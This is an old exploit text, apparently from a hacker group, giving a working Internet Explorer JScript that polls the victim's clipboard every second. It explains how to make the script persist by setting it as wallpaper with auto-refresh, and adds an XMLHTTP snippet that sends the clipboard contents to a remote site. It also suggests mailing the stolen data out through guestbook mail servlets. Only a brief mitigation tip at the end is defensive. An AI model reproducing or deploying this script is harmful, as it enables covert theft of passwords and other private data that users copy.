ie-clipboard exploit by tom gilder (as condensed by alcopaul)

save as index.html (or any name that you want)
//------------------------------------------------
<SCRIPT type=text/jscript>
var clipStr, clipInt;
clipInt = setInterval(checkClip, 1000); 
if (!window.clipboardData)
{
alert("IE version is less than 5");
}
function checkClip()
{
try 
{
var newStr = clipboardData.getData("Text");
} 
catch(e) 
{
alert("security settings enabled");
}
if (clipStr != newStr)
{
alert("Clipboard content is \"" + newStr + "\".");
clipStr = newStr;
}
}
</SCRIPT>
---------------------------------------------------

howto use...

to ensure that this is always activated, set the file as
a wallpaper... add the "always refresh" routine to the file..

getting remote data
-------------------

as suggested by tom gilder

use Microsoft.XMLHTTP activexobject to upload the data to a site..

--------------------------------------------------------------
var httpObj = new ActiveXObject("Microsoft.XMLHTTP");
httpObj.open("GET", "http://my.site.com/myscript.asp", false);
httpObj.send(newStr);
--------------------------------------------------------------

my suggestion

use http mail servlets (as used in guestbooks that automatically mail gb entries
to guestbook owners) to directly mail the clipboard data to you..

or

save the clipboard data contents to a file then let a program mail
it to you...

solution

goto tools menu of your ie browser, select internet options the security then
click custom level, disable allow paste operations via script or turn off
scripting to avoid all kinds of script malwares/exploit..

regards,
alcopaul/brigada ocho

